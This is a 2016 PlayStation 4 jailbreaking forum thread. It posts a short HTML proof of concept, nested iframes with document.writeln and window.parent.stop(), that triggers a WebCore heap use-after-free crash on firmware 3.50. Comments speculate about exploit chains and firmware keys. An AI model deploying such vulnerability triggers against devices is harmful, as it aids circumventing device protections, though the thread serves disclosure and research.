Category PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       30,348       49            
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg
 

Comments

sEKTOR

Developer(Team Ze0s)
Developer
Senior Member
Contributor
this method is easy as I said earlier the gap is there. while not one.
 

PLAYER 1

Senior Member
Contributor
So, today... what kind of code could be injected, what kind of homebrews could be created based on this findings ???

I dont know the ps4 system, so please, someone could explain it, ? please.
Thanks.
 

Chaos Kid

Developer
Senior Member
Contributor
i think it is in this direction ->

Find a Vuin -> If found like the Memory error -> Check if the Vuln is exploitable -> If so its a good sign -> Next step use a exploit to the vuln for an entry point -> entry point ok -> exploit for userland is needed -> if found -> use exploit for userland to gain kernel access -> now we have Kernel access but another exploit is needed for gain root or run own code....

Just my thinking it can be wrong maybe a dev (Mr Toolchain and Mrs Kernel aka @Chaos Kid aka CFWProphet ^^) could explain if this is ok....^^
This vulnerability is good it does work with a few different ways I have tested so far. No need for code injection and if you stay close with original compiler you can literally crash the system and see the heap on memory and where the loc pointer shod be directed.
Keep in mind I'm not just known for toolchains nor kernels I dig out the info for whats usable and how it can work to come together.
Some information
This is very close to ode rigid body moving objects simulation.
 

Winchest

Senior Member
Contributor
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?
 

mcmrc1

Senior Member
Contributor
Verified
I´m new to here.
Just a simple question.

What the devs need for a jailbreak?
I mean, the entry point is there and you can get root privileges.

What does the devs need for a CFW like Rebug for example?
first of all they need keys !!! To decrypt the Firmware change the files and encrypt them again that the PS4 recognize the Firmware as a valid one....

Correct me if iam wrong....
 
Recent Articles
PS4 System Software / Firmware 7.01 is Now Live, Don't Update!
It figures Sony wouldn't let the holidays roll by without giving the PlayStation 4 scene a present worthy of regifting, and today following their previous PS4 OFW update comes PS4 System Software...
Resident Evil 3 Returns to PlayStation 4 on April 3rd, 2020
In the footsteps of Resident Evil 2 on PS4 comes Capcom's return to Raccoon City in Resident Evil 3 arriving on PlayStation 4 next April 3rd, 2020! 🦝 Here are some RE3 PS4 screenshots alongside...
Sony PlayStation State of Play Live Stream for December 10th, 2019
Today as scheduled Sony held their last PlayStation State of Play December 2019 conference for the year, with a recap of the live stream and video game highlights below for those who missed it...
Redbox Video Game Rentals to End This Year, Game Sales by Early 2020
As GameStop reported massive financial losses and announced the closing of more stores this year, it appears Redbox is getting out of the video game rental business by the end of 2019... they'll...
Top